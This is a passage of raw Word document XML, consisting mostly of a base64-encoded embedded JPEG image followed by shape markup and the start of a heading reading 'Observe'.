xY+IngX4man4ZNvN4f0&#10;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&#10;r3OQWSr/02dX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HES+z&#10;cAMAAGwIAAAOAAAAAAAAAAAAAAAAADwCAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQAB&#10;h3AZVVoBAFVaAQAVAAAAAAAAAAAAAAAAANgFAABkcnMvbWVkaWEvaW1hZ2UxLmpwZWdQSwECLQAU&#10;AAYACAAAACEA1WO2bN4AAAAFAQAADwAAAAAAAAAAAAAAAABgYAEAZHJzL2Rvd25yZXYueG1sUEsB&#10;Ai0AFAAGAAgAAAAhAFhgsxu6AAAAIgEAABkAAAAAAAAAAAAAAAAAa2EBAGRycy9fcmVscy9lMm9E&#10;b2MueG1sLnJlbHNQSwUGAAAAAAYABgB9AQAAXGIBAAAA&#10;">
                <v:shape id="Image 47" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:95;top:95;width:36017;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tZxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Li8JA&#10;EITvgv9haMGbThTXR8woIgjCIrtrPHhsMp0HZnpCZtTsv98RFjwWVfUVlWw7U4sHta6yrGAyjkAQ&#10;Z1ZXXCi4pIfREoTzyBpry6TglxxsN/1egrG2T/6hx9kXIkDYxaig9L6JpXRZSQbd2DbEwctta9AH&#10;2RZSt/gMcFPLaRTNpcGKw0KJDe1Lym7nu1HwcUo/zeprkprmMLO77vua4+Wq1HDQ7dYgPHX+Hf5v&#10;H7WC2QJeX8IPkJs/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOQem1nEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;">
                  <v:imagedata r:id="rId40" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 48" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:36113;height:22117;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3611245,221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h9wAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LagIx&#10;FN0X/IdwBXc10UrR0SgiLQi2Cx+4vkyuk9HJzTBJZ8a/bxaFLg/nvdr0rhItNaH0rGEyViCIc29K&#10;LjRczp+vcxAhIhusPJOGJwXYrAcvK8yM7/hI7SkWIoVwyFCDjbHOpAy5JYdh7GvixN184zAm2BTS&#10;NNilcFfJqVLv0mHJqcFiTTtL+eP04zSorp18XKW63nc8M19vh2AX37nWo2G/XYKI1Md/8Z97bzTM&#10;0tj0Jf0Auf4FAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAkTI4fcAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m,2211704r3611245,l3611245,,,,,2211704xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E085E" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="577"/>
        </w:tabs>
        <w:spacing w:before="226"/>
        <w:ind w:left="577" w:hanging="217"/>
      </w:pPr>
      <w:r>
        <w:t>Observe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
